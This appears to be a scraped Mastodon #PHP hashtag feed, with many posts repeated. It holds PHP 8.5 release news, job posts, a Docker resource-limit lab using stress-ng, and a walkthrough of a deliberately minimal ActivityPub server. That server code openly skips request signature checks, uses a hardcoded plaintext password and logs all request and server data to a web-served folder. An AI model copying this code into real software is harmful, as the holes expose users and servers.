#PHP

Presenting at #NWDUG in half an hour. Better put my face on and start gargling white wine. #Ansible, #PHP, #Drupal and other good stuff shortly... Maybe see you there... 🙏

https://www.meetup.com/nwdrupal/events/311358128

Spent the afternoon banging my head against the wall trying to get xdebug to work on my newish VM. It seems every time I set up xdebug I have to clear the afternoon of any other ambitions.

The nearly 2 hour saga ended with this, from my notes:

"Actually the reason xdebug wasn't stopping on the breakpoint is the same reason I was getting f**** up data and is the reason I was setting up the debugger in the first place: I forgot the break statement in the switch case. "

Oof Mondays after Thanksgiving are rough. I'm going to go mow the lawn or something.

#php #programming

#JetBrains issue tracker now has an AI assistant enabled by default that tries to drive you crazy by interrupting you continuously while you try to type.

#php #phpstorm

#JetBrains issue tracker now has an AI assistant enabled by default that tries to drive you crazy by interrupting you continuously while you try to type.

#php #phpstorm

ActivityPub Server in a Single PHP File

https://shkspr.mobi/blog/2024/02/activitypub-server-in-a-single-file/

Any computer program can be designed to run from a single file if you architect it wrong enough!

I wanted to create the simplest possible Fediverse server which can be used as an educational tool to show how ActivityPub / Mastodon works.

The design goals were:

• Upload a single PHP file to the server.
• No databases or separate config files.
• Single Actor (i.e. not multi-user).
• Allow the Actor to be followed.
• Post plain-text messages to followers.
• Be roughly standards compliant.

And those goals have all been met! Check it out on GitLab. I warn you though, it is the nadir of bad coding. There are no tests, bugger-all security, scalability isn't considered, and it is a mess. But it works.

You can follow the test user @example@example.viii.fi

Architecture

Firstly, I've slightly cheated on my "single file" stipulation. There's an .htaccess file which turns example.com/whatever into example.com/index.php?path=whatever

The index.php file then takes that path and does stuff. It also contains all the configuration variables which is very bad practice.

Rather than using a database, it saves files to disk.

Again, this is not suitable for any real world use. This is an educational tool to help explain the basics of posting messages to the Fediverse. It requires absolutely no dependencies. You do not need to spin up a dockerised hypervisor to manage your node bundles and re-compile everything to WASM. Just FTP the file up to prod and you're done.

Walkthrough

This is a quick ramble through the code. It is reasonably well documented, I hope.

Preamble

This is where you set up your account's name and bio. You also need to provide a public/private keypair. The posting page is protected with a password that also needs to be set here.

 PHP    //  Set up the Actor's information    $username = rawurlencode("example");    //  Encoded as it is often used as part of a URl    $realName = "E. Xample. Jr.";    $summary  = "Some text about the user.";    $server   = $_SERVER["SERVER_NAME"];    //  Domain name this is hosted on    //  Generate locally or from https://cryptotools.net/rsagen    //  Newlines must be replaced with "\n"    $key_private = "-----BEGIN RSA PRIVATE KEY-----\n...\n-----END RSA PRIVATE KEY-----";    $key_public  = "-----BEGIN PUBLIC KEY-----\n...\n-----END PUBLIC KEY-----";    //  Password for sending messages    $password = "P4ssW0rd";

Logging

ActivityPub is a "chatty" protocol. This takes all the requests your server receives and saves them in /logs/ as a datestamped text file.

 PHP    // Get all headers and requests sent to this server    $headers     = print_r( getallheaders(), true );    $postData    = print_r( $_POST,    true );    $getData     = print_r( $_GET,     true );    $filesData   = print_r( $_FILES,   true );    $body        = json_decode( file_get_contents( "php://input" ), true );    $bodyData    = print_r( $body,    true );    $requestData = print_r( $_REQUEST, true );    $serverData  = print_r( $_SERVER,  true );    //  Get the type of request - used in the log filename    if ( isset( $body["type"] ) ) {        $type = " " . $body["type"];    } else {        $type = "";    }    //  Create a timestamp in ISO 8601 format for the filename    $timestamp = date( "c" );    //  Filename for the log    $filename  = "{$timestamp}{$type}.txt";    //  Save headers and request data to the timestamped file in the logs directory    if( ! is_dir( "logs" ) ) { mkdir( "logs"); }    file_put_contents( "logs/{$filename}",         "Headers:     \n$headers    \n\n" .        "Body Data:   \n$bodyData   \n\n" .        "POST Data:   \n$postData   \n\n" .        "GET Data:    \n$getData    \n\n" .        "Files Data:  \n$filesData  \n\n" .        "Request Data:\n$requestData\n\n" .        "Server Data: \n$serverData \n\n"    );

Routing

The .htaccess changes /whatever to /?path=whateverThis runs the function of the path requested.

 PHP    !empty( $_GET["path"] )  ? $path = $_GET["path"] : die();    switch ($path) {        case ".well-known/webfinger":            webfinger();        case rawurldecode( $username ):            username();        case "following":            following();        case "followers":            followers();        case "inbox":            inbox();        case "write":            write();        case "send":            send();        default:            die();    }

WebFinger

The WebFinger Protocol is used to identify accounts.It is requested with example.com/.well-known/webfinger?resource=acct:username@example.comThis server only has one user, so it ignores the query string and always returns the same details.

 PHP    function webfinger() {        global $username, $server;        $webfinger = array(            "subject" => "acct:{$username}@{$server}",              "links" => array(                array(                     "rel" => "self",                    "type" => "application/activity+json",                    "href" => "https://{$server}/{$username}"                )            )        );        header( "Content-Type: application/json" );        echo json_encode( $webfinger );        die();    }

Username

Requesting example.com/username returns a JSON document with the user's information.

 PHP    function username() {        global $username, $realName, $summary, $server, $key_public;        $user = array(            "@context" => [                "https://www.w3.org/ns/activitystreams",                "https://w3id.org/security/v1"            ],                                   "id" => "https://{$server}/{$username}",                                 "type" => "Person",                            "following" => "https://{$server}/following",                            "followers" => "https://{$server}/followers",                                "inbox" => "https://{$server}/inbox",                    "preferredUsername" =>  rawurldecode($username),                                 "name" => "{$realName}",                              "summary" => "{$summary}",                                  "url" => "https://{$server}",            "manuallyApprovesFollowers" =>  true,                         "discoverable" =>  true,                            "published" => "2024-02-12T11:51:00Z",            "icon" => [                     "type" => "Image",                "mediaType" => "image/png",                      "url" => "https://{$server}/icon.png"            ],            "publicKey" => [                "id"           => "https://{$server}/{$username}#main-key",                "owner"        => "https://{$server}/{$username}",                "publicKeyPem" => $key_public            ]        );        header( "Content-Type: application/activity+json" );        echo json_encode( $user );        die();    }

Following & Followers

These JSON documents show how many users are following / followers-of this account.The information here is self-attested. So you can lie and use any number you want.

 PHPfunction following() {        global $server;        $following = array(              "@context" => "https://www.w3.org/ns/activitystreams",                    "id" => "https://{$server}/following",                  "type" => "Collection",            "totalItems" => 0,                 "items" => []        );        header( "Content-Type: application/activity+json" );        echo json_encode( $following );        die();    }    function followers() {        global $server;        $followers = array(              "@context" => "https://www.w3.org/ns/activitystreams",                    "id" => "https://{$server}/followers",                  "type" => "Collection",            "totalItems" => 0,                 "items" => []        );        header( "Content-Type: application/activity+json" );        echo json_encode( $followers );        die();    }

Inbox

The /inbox is the main server. It receives all requests. This server only responds to "Follow" requests.A remote server sends a follow request which is a JSON file saying who they are.This code does not cryptographically validate the headers of the received message.The name of the remote user's server is saved to a file so that future messages can be delivered to it.An accept request is cryptographically signed and POST'd back to the remote server.

 PHP    function inbox() {        global $body, $server, $username, $key_private;        //  Get the message and type        $inbox_message = $body;        $inbox_type = $inbox_message["type"];        //  This inbox only responds to follow requests        if ( "Follow" != $inbox_type ) { die(); }        //  Get the parameters        $inbox_id    = $inbox_message["id"];        $inbox_actor = $inbox_message["actor"];        $inbox_host  = parse_url( $inbox_actor, PHP_URL_HOST );        //  Does this account have any followers?        if( file_exists( "followers.json" ) ) {            $followers_file = file_get_contents( "followers.json" );            $followers_json = json_decode( $followers_file, true );        } else {            $followers_json = array();        }        //  Add user to list. Don't care about duplicate users, server is what's important        $followers_json[$inbox_host]["users"][] = $inbox_actor;        //  Save the new followers file        file_put_contents( "followers.json", print_r( json_encode( $followers_json ), true ) );        //  Response Message ID        //  This isn't used for anything important so could just be a random number        $guid = uuid();        //  Create the Accept message        $message = [            "@context" => "https://www.w3.org/ns/activitystreams",            "id"       => "https://{$server}/{$guid}",            "type"     => "Accept",            "actor"    => "https://{$server}/{$username}",            "object"   => [                "@context" => "https://www.w3.org/ns/activitystreams",                "id"       =>  $inbox_id,                "type"     =>  $inbox_type,                "actor"    =>  $inbox_actor,                "object"   => "https://{$server}/{$username}",            ]        ];        //  The Accept is sent to the server of the user who requested the follow        //  TODO: The path doesn't *always* end with/inbox        $host = $inbox_host;        $path = parse_url( $inbox_actor, PHP_URL_PATH ) . "/inbox";        //  Get the signed headers        $headers = generate_signed_headers( $message, $host, $path );        //  Specify the URL of the remote server's inbox        //  TODO: The path doesn't *always* end with /inbox        $remoteServerUrl = $inbox_actor . "/inbox";        //  POST the message and header to the requester's inbox        $ch = curl_init( $remoteServerUrl );        curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );        curl_setopt( $ch, CURLOPT_CUSTOMREQUEST, "POST" );        curl_setopt( $ch, CURLOPT_POSTFIELDS,     json_encode($message) );        curl_setopt( $ch, CURLOPT_HTTPHEADER,     $headers );        $response = curl_exec( $ch );        //  Check for errors        if( curl_errno( $ch ) ) {            file_put_contents( "error.txt",  curl_error( $ch ) );        }        curl_close($ch);        die();    }

UUID

Every message sent should have a unique ID. This can be anything you like. Some servers use a random number.I prefer a date-sortable string.

 PHP    function uuid() {        return sprintf( "%08x-%04x-%04x-%04x-%012x",            time(),            mt_rand(0, 0xffff),            mt_rand(0, 0xffff),            mt_rand(0, 0x3fff) | 0x8000,            mt_rand(0, 0xffffffffffff)        );    }

Signing Headers

Every message that your server sends needs to be cryptographically signed with your Private Key.This is a complicated process. Please read "How to make friends and verify requests" for more information.

 PHP    function generate_signed_headers( $message, $host, $path ) {        global $server, $username, $key_private;        //  Encode the message to JSON        $message_json = json_encode( $message );        //  Location of the Public Key        $keyId = "https://{$server}/{$username}#main-key";        //  Generate signing variables        $hash   = hash( "sha256", $message_json, true );        $digest = base64_encode( $hash );        $date   = date( "D, d M Y H:i:s \G\M\T" );        //  Get the Private Key        $signer = openssl_get_privatekey( $key_private );        //  Sign the path, host, date, and digest        $stringToSign = "(request-target): post $path\nhost: $host\ndate: $date\ndigest: SHA-256=$digest";        //  The signing function returns the variable $signature        //  https://www.php.net/manual/en/function.openssl-sign.php        openssl_sign(            $stringToSign,             $signature,             $signer,             OPENSSL_ALGO_SHA256        );        //  Encode the signature        $signature_b64 = base64_encode( $signature );        //  Full signature header        $signature_header = 'keyId="' . $keyId . '",algorithm="rsa-sha256",headers="(request-target) host date digest",signature="' . $signature_b64 . '"';        //  Header for POST reply        $headers = array(                    "Host: {$host}",                    "Date: {$date}",                  "Digest: SHA-256={$digest}",               "Signature: {$signature_header}",            "Content-Type: application/activity+json",                  "Accept: application/activity+json",        );        return $headers;    }

User Interface for Writing

This creates a basic HTML form. Type in your message and your password. It then POSTs the data to the /send endpoint.

 PHP    function write() {        //  Display an HTML form for the user to enter a message.echo <<< HTML<!DOCTYPE html><html lang="en-GB">    <head>        <meta charset="UTF-8">        <title>Send Message</title>        <style>            *{font-family:sans-serif;font-size:1.1em;}        </style>    </head>    <body>        <form action="/send" method="post" enctype="multipart/form-data">            <label   for="content">Your message:</label><br>            <textarea id="content" name="content" rows="5" cols="32"></textarea><br>            <label   for="password">Password</label><br>            <input  type="password" name="password" id="password" size="32"><br>            <input  type="submit"  value="Post Message">         </form>    </body></html>HTML;        die();    }

Send Endpoint

This takes the submitted message and checks the password is correct.It reads the followers.json file and sends the message to every server that is following this account.

 PHP    function send() {        global $password, $server, $username, $key_private;        //  Does the posted password match the stored password?        if( $password != $_POST["password"] ) { die(); }        //  Get the posted content        $content = $_POST["content"];        //  Current time - ISO8601        $timestamp = date( "c" );        //  Outgoing Message ID        $guid = uuid();        //  Construct the Note        //  contentMap is used to prevent unnecessary "translate this post" pop ups        // hardcoded to English        $note = [            "@context"     => array(                "https://www.w3.org/ns/activitystreams"            ),            "id"           => "https://{$server}/posts/{$guid}.json",            "type"         => "Note",            "published"    => $timestamp,            "attributedTo" => "https://{$server}/{$username}",            "content"      => $content,            "contentMap"   => ["en" => $content],            "to"           => ["https://www.w3.org/ns/activitystreams#Public"]        ];        //  Construct the Message        $message = [            "@context" => "https://www.w3.org/ns/activitystreams",            "id"       => "https://{$server}/posts/{$guid}.json",            "type"     => "Create",            "actor"    => "https://{$server}/{$username}",            "to"       => [                "https://www.w3.org/ns/activitystreams#Public"            ],            "cc"       => [                "https://{$server}/followers"            ],            "object"   => $note        ];        //  Create the context for the permalink        $note = [ "@context" => "https://www.w3.org/ns/activitystreams", ...$note ];        //  Save the permalink        $note_json = json_encode( $note );        //  Check for posts/ directory and create it        if( ! is_dir( "posts" ) ) { mkdir( "posts"); }        file_put_contents( "posts/{$guid}.json", print_r( $note_json, true ) );        //  Read existing users and get their hosts        $followers_file = file_get_contents( "followers.json" );        $followers_json = json_decode( $followers_file, true );             $hosts = array_keys( $followers_json );        //  Prepare to use the multiple cURL handle        $mh = curl_multi_init();        //  Loop through all the severs of the followers        //  Each server needs its own cURL handle        //  Each POST to an inbox needs to be signed separately        foreach ( $hosts as $host ) {            $path = "/inbox";            //  Get the signed headers            $headers = generate_signed_headers( $message, $host, $path );            // Specify the URL of the remote server            $remoteServerUrl = "https://{$host}{$path}";            //  POST the message and header to the requester's inbox            $ch = curl_init( $remoteServerUrl );            curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );            curl_setopt( $ch, CURLOPT_CUSTOMREQUEST, "POST" );            curl_setopt( $ch, CURLOPT_POSTFIELDS,     json_encode($message) );            curl_setopt( $ch, CURLOPT_HTTPHEADER,     $headers );            //  Add the handle to the multi-handle            curl_multi_add_handle( $mh, $ch );        }        //  Execute the multi-handle        do {            $status = curl_multi_exec( $mh, $active );            if ( $active ) {                curl_multi_select( $mh );            }        } while ( $active && $status == CURLM_OK );        //  Close the multi-handle        curl_multi_close( $mh );        //  Render the JSON so the user can see the POST has worked        header( "Location: https://{$server}/posts/{$guid}.json" );        die();    }

Next Steps

This is not intended to be used in production. Ever. But if you would like to contribute more simple examples of how the protocol works, please come and play on GitLab.

You can follow the test user @example@example.viii.fi

#activitypub #mastodon #php

So what is everyone using to *parse* emails in PHP?

I don't want to send emails! I am receiving emails and need to parse them. Ideally I'd get a Symfony\Component\Mime\Message back...

Is there already something? Preferrably without too many unnecessary dependencies (looking at you, Carbon et al)...

Or do I need to write something?

#php #email #mime

So what is everyone using to *parse* emails in PHP?

I don't want to send emails! I am receiving emails and need to parse them. Ideally I'd get a Symfony\Component\Mime\Message back...

Is there already something? Preferrably without too many unnecessary dependencies (looking at you, Carbon et al)...

Or do I need to write something?

#php #email #mime

The #PHP 8.5 release announcement page looks amazing! https://www.php.net/releases/8.5/en.php

I’d love to see this design treatment applied to the rest of php.net.

The #PHP 8.5 release announcement page looks amazing! https://www.php.net/releases/8.5/en.php

I’d love to see this design treatment applied to the rest of php.net.

The #PHP 8.5 release announcement page looks amazing! https://www.php.net/releases/8.5/en.php

I’d love to see this design treatment applied to the rest of php.net.

The #PHP 8.5 release announcement page looks amazing! https://www.php.net/releases/8.5/en.php

I’d love to see this design treatment applied to the rest of php.net.

How cool is the PHP 8.5 release features page? https://www.php.net/releases/8.5/en.php 😎 very modern and shiny #php #phpc #thephpfoundation #thephpf

How cool is the PHP 8.5 release features page? https://www.php.net/releases/8.5/en.php 😎 very modern and shiny #php #phpc #thephpfoundation #thephpf

In Amsterdam next week and part of a group underrepresented at tech confs, or can't afford a ticket? Private Packagist is sponsoring @symfony Con (Nov 27th/28th) and we have a ticket to give away: Reply your favorite PHP8.5 feature to win #php #phpc #symfony #symfonycon

In Amsterdam next week and part of a group underrepresented at tech confs, or can't afford a ticket? Private Packagist is sponsoring @symfony Con (Nov 27th/28th) and we have a ticket to give away: Reply your favorite PHP8.5 feature to win #php #phpc #symfony #symfonycon

🥳 PHP 8.5 Released!

In this new release, we have:

🌐 URI Extension
▶️ Pipe Operator
📑 Clone With
⚠️ A New #[\NoDiscard] Attribute
🆕 Closures and First-Class Callables in Constant Expressions
🌀 Persistent cURL Share Handles

👓 Read all about it on: https://www.php.net/releases/8.5/

🔗 https://php.net/ChangeLog-8#8.5.0
📦 https://php.net/downloads

#PHP #PHP85 #Release

🥳 PHP 8.5 Released!

In this new release, we have:

🌐 URI Extension
▶️ Pipe Operator
📑 Clone With
⚠️ A New #[\NoDiscard] Attribute
🆕 Closures and First-Class Callables in Constant Expressions
🌀 Persistent cURL Share Handles

👓 Read all about it on: https://www.php.net/releases/8.5/

🔗 https://php.net/ChangeLog-8#8.5.0
📦 https://php.net/downloads

#PHP #PHP85 #Release

🥳 PHP 8.5 Released!

In this new release, we have:

🌐 URI Extension
▶️ Pipe Operator
📑 Clone With
⚠️ A New #[\NoDiscard] Attribute
🆕 Closures and First-Class Callables in Constant Expressions
🌀 Persistent cURL Share Handles

👓 Read all about it on: https://www.php.net/releases/8.5/

🔗 https://php.net/ChangeLog-8#8.5.0
📦 https://php.net/downloads

#PHP #PHP85 #Release

🥳 PHP 8.5 Released!

In this new release, we have:

🌐 URI Extension
▶️ Pipe Operator
📑 Clone With
⚠️ A New #[\NoDiscard] Attribute
🆕 Closures and First-Class Callables in Constant Expressions
🌀 Persistent cURL Share Handles

👓 Read all about it on: https://www.php.net/releases/8.5/

🔗 https://php.net/ChangeLog-8#8.5.0
📦 https://php.net/downloads

#PHP #PHP85 #Release

As some folks know, I am back on the job market.

26 year PHP Veteran, extensive Open Source and community experience. Specializing in modernization, training up teams, technical leadership, and long-term thinking. Some Kotlin experience as well, but not a ton.

Currently looking for Staff/Principal or Director/CTO level roles. Size of company flexible. Full time remote, US Central Time.

More details on LinkedIn: https://www.linkedin.com/in/larry-garfield/

Boosts welcome, etc.

#PHP #FediHire #Kotlin

After Composer 2.9 CLI security improvements, we're working on a transparency log for Packagist org to strengthen PHP supply chain security, funded by the Sovereign Tech Agency with help of the PHP Foundation and Private Packagist. #php #phpc #composerphp

More detail about what we're working on can be viewed on our blog at https://blog.packagist.com/strengthening-php-supply-chain-security-with-a-transparency-log-for-packagist-org/

After Composer 2.9 CLI security improvements, we're working on a transparency log for Packagist org to strengthen PHP supply chain security, funded by the Sovereign Tech Agency with help of the PHP Foundation and Private Packagist. #php #phpc #composerphp

More detail about what we're working on can be viewed on our blog at https://blog.packagist.com/strengthening-php-supply-chain-security-with-a-transparency-log-for-packagist-org/

Composer 2.9 is here! 🚀 It automatically blocks packages with known vulnerabilities, has a new repository command to manage repos from the CLI, and lots more!

Read the full announcement: https://blog.packagist.com/composer-2-9/
#composerphp #phpc #PHP

Composer 2.9 is here! 🚀 It automatically blocks packages with known vulnerabilities, has a new repository command to manage repos from the CLI, and lots more!

Read the full announcement: https://blog.packagist.com/composer-2-9/
#composerphp #phpc #PHP

As some folks know, I am back on the job market.

26 year PHP Veteran, extensive Open Source and community experience. Specializing in modernization, training up teams, technical leadership, and long-term thinking. Some Kotlin experience as well, but not a ton.

Currently looking for Staff/Principal or Director/CTO level roles. Size of company flexible. Full time remote, US Central Time.

More details on LinkedIn: https://www.linkedin.com/in/larry-garfield/

Boosts welcome, etc.

#PHP #FediHire #Kotlin

As some folks know, I am back on the job market.

26 year PHP Veteran, extensive Open Source and community experience. Specializing in modernization, training up teams, technical leadership, and long-term thinking. Some Kotlin experience as well, but not a ton.

Currently looking for Staff/Principal or Director/CTO level roles. Size of company flexible. Full time remote, US Central Time.

More details on LinkedIn: https://www.linkedin.com/in/larry-garfield/

Boosts welcome, etc.

#PHP #FediHire #Kotlin

As some folks know, I am back on the job market.

26 year PHP Veteran, extensive Open Source and community experience. Specializing in modernization, training up teams, technical leadership, and long-term thinking. Some Kotlin experience as well, but not a ton.

Currently looking for Staff/Principal or Director/CTO level roles. Size of company flexible. Full time remote, US Central Time.

More details on LinkedIn: https://www.linkedin.com/in/larry-garfield/

Boosts welcome, etc.

#PHP #FediHire #Kotlin

The PHP Foundation is Seeking a New Executive Director! 🐘💜

We're asking the PHP community to help find the right person for this role. If you know someone who would be an excellent fit, please encourage them to apply or reach out to us directly.

https://thephp.foundation/blog/2025/11/10/seeking-new-executive-director/ #php #phpc #opensource

J'ai repris ma recherche de boulot vu que ma formation va se terminer, j'abandonne un peu l'idée de faire du #python vu que je suis junior dans cette techno et que c'est la merde en ce moment pour trouver du boulot

bon au moins mes compétences python m'aident à fouiner les sites de recherche d'emplois (et me permettent de m'amuser sur mon temps libre)

Mais si y'a des gens qui connaissent des boîtes qui recrutent.

Je cherche dans développement web #PHP #Symfony #Laravel #Angular
avec + de 10 ans d'expérience

Sur Lyon principalement (ou remote)

Boost bienvenue 🫂 #jeChercheUnJob

Salut !

C'est la merde ici bas, on va pas se mentir.

J'ai besoin d'aide pour trouver du travail rapidement sous peine de me retrouver sans logement.

Je suis un développeur PHP senior avec presque 10 ans d'expérience dans le dev web, je suis aussi pertinent en back qu'en fullstack (html, css, js et ses frameworks front).

Je cherche sur Montpellier ou en 100% remote.

Je passe mon CV en MP si besoin.

A défaut de pouvoir m'aider, un boost serait super utile, merci !

#php #symfony #laravel #dev #jechercheunjob

J'ai repris ma recherche de boulot vu que ma formation va se terminer, j'abandonne un peu l'idée de faire du #python vu que je suis junior dans cette techno et que c'est la merde en ce moment pour trouver du boulot

bon au moins mes compétences python m'aident à fouiner les sites de recherche d'emplois (et me permettent de m'amuser sur mon temps libre)

Mais si y'a des gens qui connaissent des boîtes qui recrutent.

Je cherche dans développement web #PHP #Symfony #Laravel #Angular
avec + de 10 ans d'expérience

Sur Lyon principalement (ou remote)

Boost bienvenue 🫂 #jeChercheUnJob

Salut !

C'est la merde ici bas, on va pas se mentir.

J'ai besoin d'aide pour trouver du travail rapidement sous peine de me retrouver sans logement.

Je suis un développeur PHP senior avec presque 10 ans d'expérience dans le dev web, je suis aussi pertinent en back qu'en fullstack (html, css, js et ses frameworks front).

Je cherche sur Montpellier ou en 100% remote.

Je passe mon CV en MP si besoin.

A défaut de pouvoir m'aider, un boost serait super utile, merci !

#php #symfony #laravel #dev #jechercheunjob

Having trouble with running Redis? Try Apache KVRocks!

Here is my new talk:

From Redis to Apache KVRocks (it's not about the license):
https://github.com/thomas-0816/talks/blob/master/From_Redis_To_Apache_KVRocks_2025_ThomasBley.pdf?raw=true

#redis #valkey #php

9 Good Low-Cost VPSs for PHP ! 🇺🇸

9 VPS Buenos de Bajo Coste para PHP !

#programming #coding #programación #code #webdevelopment #devs #softwaredevelopment #vps #php

9 Good Low-Cost VPSs for PHP ! 🇺🇸

9 VPS Buenos de Bajo Coste para PHP !

#programming #coding #programación #code #webdevelopment #devs #softwaredevelopment #vps #php

I've written a new talk :)

Run LLMs _locally_ with integrated AMD GPUs and unified memory:
https://github.com/thomas-0816/talks/blob/master/Run_LLMs_Locally_2025_ThomasBley.pdf?raw=true

#llm #llamacpp #gptoss #qwen3 #curl #php

Here's my wishlist for #PHP in 2026. I don't think I'm asking too much, what do you think? 😇

https://stitcher.io/blog/my-wishlist-for-php-in-2026

Every now and then, I need do #PHP package major version upgrades, and I'm always positively surprised at how a healthy part of the community actively fights breaking change propagation, where possible :-)

I wish that other communities that constantly operate in the 0.0.x dependency version space learned from this.

Loved reading this post about #PHP ’s new URI extension - the amount of work in making it good, secure, and extendible for the future is impressive, but the benefits being extended not only to PHP, but also to upstream projects is quite delightful.

https://thephp.foundation/blog/2025/10/10/php-85-uri-extension/

Loved reading this post about #PHP ’s new URI extension - the amount of work in making it good, secure, and extendible for the future is impressive, but the benefits being extended not only to PHP, but also to upstream projects is quite delightful.

https://thephp.foundation/blog/2025/10/10/php-85-uri-extension/

Hey PHP and Intelephense friends - I have a newbie question.

Is there any way to find *all* the problems in my code without manually scrolling through?

For example, I've found this "declared but not used" issue. I want to see all instances of this error across all my project's files.

Is that possible?

#PHP #Intelephense #VSCode

Hey PHP and Intelephense friends - I have a newbie question.

Is there any way to find *all* the problems in my code without manually scrolling through?

For example, I've found this "declared but not used" issue. I want to see all instances of this error across all my project's files.

Is that possible?

#PHP #Intelephense #VSCode

Grrr. Getting hit by a fairly aggressive scraper on my blog.
Same user-agent, but different IP addresses - all from China.
It is using JS - but I really don't want to put up a CAPTCHA or similar. Deters too many legitimate visitors.

Anyone have a simple solution for WordPress / PHP?

#WordPress #php #bots

Une mission longue se termine, je vais avoir de la dispo à partir de fin octobre !

Je fais du développement back #php et suis expert #drupal.

Je joue beaucoup avec la CI pour automatiser la chaîne de production d'une app web.

#Docker pour le dev ou la prod.

Formation, atelier, accompagnement sur tous ces sujets.

Le tout en indépendant depuis l’Auvergne mais je me déplace avec plaisir quand c'est nécessaire.

https://www.linkedin.com/feed/update/urn:li:activity:7378860770412929025/

#job #freelance

Une mission longue se termine, je vais avoir de la dispo à partir de fin octobre !

Je fais du développement back #php et suis expert #drupal.

Je joue beaucoup avec la CI pour automatiser la chaîne de production d'une app web.

#Docker pour le dev ou la prod.

Formation, atelier, accompagnement sur tous ces sujets.

Le tout en indépendant depuis l’Auvergne mais je me déplace avec plaisir quand c'est nécessaire.

https://www.linkedin.com/feed/update/urn:li:activity:7378860770412929025/

#job #freelance

Functional programming isn't just for Haskell developers. It's for #PHP developers, too. "Thinking Functionally in PHP" is available from LeanPub.

https://leanpub.com/thinking-functionally-in-php

Functional programming isn't just for Haskell developers. It's for #PHP developers, too. "Thinking Functionally in PHP" is available from LeanPub.

https://leanpub.com/thinking-functionally-in-php

@dansup love seeing phpstan being called out like this in other #PHP projects. Hard to imagine where modern #drupal would be without all of the work @OndrejMirtes, @mglaman and many others put into it.

🎉 PHP 8.5.0 RC 1 is available for testing!

This is the first release candidate for PHP 8.5, including

- Implementation of remaining deprecations and warnings
- Finishing up the new Uri extension
- Bug fixes thanks to your testing and feedback

… and more!

➕ Do: Test your projects!

➖ Don't: Run it in production. It's not fully ready yet.

Congratulations to Daniel, @edorian, and @adoy

🔗 https://www.php.net/archive/2025.php#2025-09-25-3

#PHP #PHP85 #Release

🎉 PHP 8.5.0 RC 1 is available for testing!

This is the first release candidate for PHP 8.5, including

- Implementation of remaining deprecations and warnings
- Finishing up the new Uri extension
- Bug fixes thanks to your testing and feedback

… and more!

➕ Do: Test your projects!

➖ Don't: Run it in production. It's not fully ready yet.

Congratulations to Daniel, @edorian, and @adoy

🔗 https://www.php.net/archive/2025.php#2025-09-25-3

#PHP #PHP85 #Release

Together with PyPI, Maven Central, crates.io and other major package registries we signed a statement on sustainable open source infrastructure.

3B+ installs/month and evolving #composerphp and packagist.org requires sharing the costs.

Our Blog: https://blog.packagist.com/a-call-for-sustainable-open-source-infrastructure/
Open Letter: https://openssf.org/blog/2025/09/23/open-infrastructure-is-not-free-a-joint-statement-on-sustainable-stewardship/

#phpc #php #supplychainsecurity #opensourcesustainability

Together with PyPI, Maven Central, crates.io and other major package registries we signed a statement on sustainable open source infrastructure.

3B+ installs/month and evolving #composerphp and packagist.org requires sharing the costs.

Our Blog: https://blog.packagist.com/a-call-for-sustainable-open-source-infrastructure/
Open Letter: https://openssf.org/blog/2025/09/23/open-infrastructure-is-not-free-a-joint-statement-on-sustainable-stewardship/

#phpc #php #supplychainsecurity #opensourcesustainability

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: Two containers went rogue last night and starved the whole host.
devops1: What are we supposed to do?

ItSec (walking by): Set limits. It's not rocket science. Docker exposes cgroup controls for CPU, memory, I/O and PIDs. Use them.

The point is: availability is part of security too. Linux control groups allow you to cap, isolate and observe resource usage, which is exactly how Docker enforces container limits for CPU, memory, block I/O and process counts [1]. Let's make it tangible with a small lab. We'll spin a container, install stress-ng, and watch limits in action.

# On the Docker host
docker run -itd --name ubuntu-limits ubuntu:22.04
docker exec -it ubuntu-limits bash

# Inside the container
apt update && apt install -y stress-ng
stress-ng --version

Check how many cores you see, then drive them.

# Inside the container
nproc

# For my host nproc returns 4
stress-ng --cpu 4 --cpu-load 100 --timeout 30s

In another terminal, watch usage from the host.

docker stats

Now clamp CPU for the running container and see the throttle take effect.

docker update ubuntu-limits --cpus=1
docker stats

The --cpus flag is a wrapper over the Linux CFS period/quota; --cpus=1 caps the container at roughly one core worth of time on a multi‑core host.

Memory limits are similar. First tighten RAM and swap, then try to over‑allocate in the container.

# On the host
docker update ubuntu-limits --memory=128m --memory-swap=256m
docker stats 

# Inside the container: stays under the cap
stress-ng --vm 1 --vm-bytes 100M --timeout 30s --vm-keep

# Inside the container: tries to exceed; you may see reclaim/pressure instead of success
stress-ng --vm 1 --vm-bytes 300M --timeout 30s --vm-keep

A few memory details matter. --memory is the hard ceiling; --memory-swap controls total RAM+swap available. Setting swap equal to memory disables swap for that container; leaving it unset often allows swap equal to the memory limit; setting -1 allows unlimited swap up to what the host provides.

docker run -it --rm \
  --name demo \
  --cpus=1 \
  --memory=256m \
  --memory-swap=256m \
  --pids-limit=25 \
  ubuntu:22.04 bash

For plain docker compose (non‑Swarm), set service‑level attributes. The Compose Services reference explicitly supports cpus, mem_limit, memswap_limit and pids_limit on services [2].

services:
  api:
    image: ubuntu:22.04
    command: ["sleep","infinity"]
    cpus: "1"              # 50% of one CPU equivalent
    mem_limit: "256m"      # hard RAM limit
    memswap_limit: "256m"  # RAM+swap; equal to mem_limit disables swap
    pids_limit: 50         # max processes inside the container

[1] https://docs.docker.com/engine/containers/resource_constraints/
[2] https://docs.docker.com/reference/compose-file/services/

For more grumpy stories visit:
1) https://infosec.exchange/@reynardsec/115093791930794699
2) https://infosec.exchange/@reynardsec/115048607028444198
3) https://infosec.exchange/@reynardsec/115014440095793678
4) https://infosec.exchange/@reynardsec/114912792051851956
5) https://infosec.exchange/@reynardsec/115133293060285123
6) https://infosec.exchange/@reynardsec/115178689445065785

#appsec #devops #programming #webdev #docker #containers #cybersecurity #infosec #cloud #sysadmin #sysops #java #php #javascript #node

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: Two containers went rogue last night and starved the whole host.
devops1: What are we supposed to do?

ItSec (walking by): Set limits. It's not rocket science. Docker exposes cgroup controls for CPU, memory, I/O and PIDs. Use them.

The point is: availability is part of security too. Linux control groups allow you to cap, isolate and observe resource usage, which is exactly how Docker enforces container limits for CPU, memory, block I/O and process counts [1]. Let's make it tangible with a small lab. We'll spin a container, install stress-ng, and watch limits in action.

# On the Docker host
docker run -itd --name ubuntu-limits ubuntu:22.04
docker exec -it ubuntu-limits bash

# Inside the container
apt update && apt install -y stress-ng
stress-ng --version

Check how many cores you see, then drive them.

# Inside the container
nproc

# For my host nproc returns 4
stress-ng --cpu 4 --cpu-load 100 --timeout 30s

